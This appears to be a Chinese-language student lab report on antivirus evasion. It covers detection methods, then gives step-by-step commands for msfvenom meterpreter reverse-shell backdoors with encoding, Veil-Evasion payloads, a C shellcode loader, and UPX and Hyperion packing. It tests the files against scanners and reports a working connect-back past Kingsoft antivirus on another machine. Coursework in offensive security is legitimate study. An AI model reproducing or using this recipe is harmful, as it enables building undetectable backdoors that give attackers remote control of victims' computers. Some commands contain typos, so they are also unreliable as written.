一、实验内容
1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)
二、基础问题回答
(1)杀软是如何检测出恶意代码的?
杀毒软件一般是通过以下三种检测方法来检测恶意代码的:
- 基于特征码的检测
根据恶意代码的各种特殊的一个或者多个片段形成一个特征码库,如果一个可执行文件(或其他运行的库、脚本等)包含特征码库中的数据则被认为是恶意代码。并不是比对整个文件,而是将其中一个或几个片断作为识别依据。所以杀毒软件的恶意代码的病毒库的更新和全面性十分重要,过时的特征码库就无法检测出新的病毒,所以我们也需要及时更新自己的杀毒软件。 - 启发式恶意软件检测
根据些片面特征去推断。通常是因为缺乏精确判定依据。如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件。
优点:
(1)可以检测0-day恶意软件
(2)具有一定通用性
缺点:
(1)实时监控系统行为,开销稍多
(2)没有基于特征码的精确度高 - 基于行为的恶意软件检测
最开始提出启发式时,一般也是针对特征扫描的而言的,指通用的、多特征的、非精确的扫描,所以后来又提出了基于行为的。从理论上讲,基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。
(2)免杀是做什么?
- 免杀就是做出令杀毒软件无法鉴定为恶意代码的后门等,无法被杀毒软件发现的程序。
(3)免杀的基本方法有哪些?
- 改变特征码
- 对exe文件加壳:压缩壳 加密壳
- 对shellcode用encode进行编码
- 基于payload重新编译生成可执行文件
- 用其他语言进行重写再编译(veil-evasion)
- 改变行为
(1)通讯方式- 尽量使用反弹式连接
- 使用隧道技术
- 加密通讯数据
(2)操作模式
- 基于内存操作
- 减少对系统的修改
- 加入混淆作用的正常功能代码
- 非常规方法
- 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
- 使用社工类攻击,诱骗目标关闭AV软件。
- 纯手工打造一个恶意软件
三、实验过程记录
3.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程。
3.1.1 正确使用msf编码器
有关msfvenom的参数与使用:
使用msf编码器,msfvenom生成如jar之类的其他文件
- Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度。理所当然,所有AV厂家都盯着呢,一有新编码算法,马上就得加到特征库里。通过编码后,按理论上讲,编码会降低检出率,大不了多编码几次,总会检不出来。
- 编码一次命令如下(用-e参数编码):
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.40.128 LPORT=4320 -f exe > 20164320_backdoor.exe
放去virscan扫描,扫出问题
改下名字重新测试
编码十次命令如下(用-i参数指定编码次数):
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.40.128 LPORT=4320 -f exe > 20164320 wanghao.exe
又是这个问题
重新改名
放入网站发现有28个软件查出问题
生成.jar文件夹msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.19.40.128 lport=4320 x> 20164320_backdoor_java.jar
结果出现这个问题???
av???什么鬼?只好改名字,在测试
结果竟然只有14%的查出了病毒???运气这么好?
msfvenom生成php文件:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.40.128lport=4320 x> 20164320_backdoor.php
竟然只有2%?????我是不是不用继续做下去了??算了,不皮了,继续
使用veil-evasion生成后门程序及检测
安装veil
- 如果镜像是2018的话,在安装之前可以先执行下面的指令,可能会需要比较长的时间
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
用
sudo apt-get install veil-evasion
命令安装Veil之后用
veil
打开veil,输入y
继续安装直至完成,这期间可能要等待较长时间:
到现在为止还算顺利,成功下载
疯狂解压
结果 到最后,在这个鬼地方卡了***半天,不管怎么调都动不了
找了半天,想到了一个办法
将这个文件拷贝到
这个目录下,就可以无需解压了
试了试,成功了!
顺利进入安装界面
开始安装
安装完毕后,打开veil
结果?????
,
疯狂报错???到网上找了半天也没有什么有建设性的建议,最后没办法,屈服于这个鬼东西
从同学那拷贝了一个过来,继续实验
输入veil
指令,会出现下面这个界面
用use evasion
命令进入Evil-Evasion
输入命令use c/meterpreter/rev_tcp.py
进入配置界面
设置反弹连接IP,命令为:
set LHOST 192.168.40.128
,注意此处的IP是KaliIP;设置端口,命令为:
set LPORT 4320
在主机中找到生成文件位置 var/lib/veil/output/handlers/generate
输入generate
生成文件,接着输入你想要playload的名字:20164320
如图所示,该文件子啊output/handlers/20164320这个位置
放入网站检测
好吧。。。。。再次修改,再上传
行吧,竟然还不如之前???
半手工注入Shellcode并执行
首先使用命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128LPORT=4320 -f c
用c语言生成一段shellcode;
- 创建一个文件
20165318.c
,然后将unsigned char buf[]
赋值到其中,代码如下:
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
使用命令:i686-w64-mingw32-g++ 20164320.c -o 20164320.exe
编译这个.c文件为可执行文件;
执行这个文件
再放入网站进行检查
.加壳尝试一下
在技术上分壳分为:
- 压缩壳
- 减少应用体积,如ASPack,UPX
- 加密壳
- 版权保护,反跟踪。如ASProtect,Armadillo
- 虚拟机
- 通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect,Themida
- 使用压缩壳(UPX)
给之前的4320.exe加个壳得到sxx_upxed.exe:
火绒还是厉害呢
加密壳Hyperion
- 将上一个生成的文件拷贝到
/usr/share/windows-binaries/hyperion/
目录中 - 进入目录
/usr/share/windows-binaries/hyperion/
中 - 输入命令
wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe
进行加壳:
结果竟然成功了!!!!
火绒竟然没有报毒,为了防止意外我又专门扫描这个exe文件,没想到,竟然通过了!!!!
运行后门软件 监听成功
任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
室友机子是windows7虚拟机 装了金山毒霸
我保留了用vs编译的最初c+shellcode版本,以及在此基础上加压缩壳的版本、再加加密壳的版本。一共三个版本,结果两个加壳的都被金山杀了,只剩最初的未加壳版本)
- 本机打开msf控制台,开始监听
- 受控机运行后门程序
没有一点意外的成功了,他的金山毒霸跟假的一样,哈哈哈哈哈哈(我们所有人在那上面都能成功)
问题
1.在安装veil时遇到了很多不明的问题... 执行veil-evasion安装veil时经常会卡进度TAT
解决:参考相关博客,最后进入/opt/Veil-Evasion
运行,/Veil-Evasion.py
就成功啦
2.交叉编译时出现错误,最后的原因是我的kali里没有自带的minw64编译器,所以需要sudo apt-get install mingw-w64
来安装。